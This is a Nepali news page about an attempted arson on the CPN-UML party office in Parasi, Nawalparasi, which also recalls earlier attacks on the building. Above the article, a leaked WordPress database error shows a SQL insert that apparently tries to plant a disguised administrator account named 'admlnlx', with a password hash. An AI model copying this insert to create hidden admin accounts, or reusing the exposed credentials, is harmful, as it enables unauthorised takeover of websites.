WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAPnVsVQuaRzW0G3/s4rK8mOwfziP/0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:55:22', '', 'admlnlx', 'admlnlx')
मोहन पौडेल
नवलपरासी,मंसिर १६-
नवलपरासीस्थित नेकपा एमालेको पार्टी कार्यालयमा आगजनी प्रयास भएको छ ।
सदरमुकाम परासीमा रहेको पार्टी कार्यालयमा गएराति अज्ञात समूहले आगो लगाउने प्रयास गरेको एमालेले जनाएको छ ।मिनिरल वाटरको बोतलमा पेट्रोल हालेर भवनमा आगोलगाउने प्रयास गरेको देखिएको नेकपा एमाले परासीका संयोजक तुल्सी पासीले जानकारी दिए ।
रातिको समयमा आगो लगाइएकोले कसले र किन आगो लगायो भन्ने बारेमा जानकारी नभएकोे पासीले बताए । सरकारले दर्ता गरेको संविधान संसोधनको विरुद्ध नेकपा एमाले विरोधमा उत्रिएकाले पार्टी कार्यालयमा आगो लगाइएको हुनसक्ने संयोजक पासीले बताए ।
आगजनीका कारण दुई तले एमाले पार्टी कार्यालयको भुइतलाको झ्याल डढेको छ भने सिसा फुटेका छन् । च्यानल गेटमा समेत आगो लगाउने प्रयास गरिएको एमाले नवलपरासीले जनाएको छ ।
नवलपरासीमा एमालेको पार्टी कार्यालयमा आगजनी र तोडफोड गरिएको यो तेस्रो पटक हो । यस अघि पनि गत वर्ष मधेस आन्दोलन तथा अखण्ड नवलपरासी आन्दोलनको समयमा एमालेको पार्टी कार्यालयमा तोडफोड भएको थियो ।
२०६७ बैशाख १० गते माओवादीका कार्यकर्ताले समेत सो भवनमा आगो लगाएका थिए । सो क्रममा दुई जना माओवादी कार्यकर्ताको मृत्यु भएको थियो भने १२ जना घाइते भएका थिए ।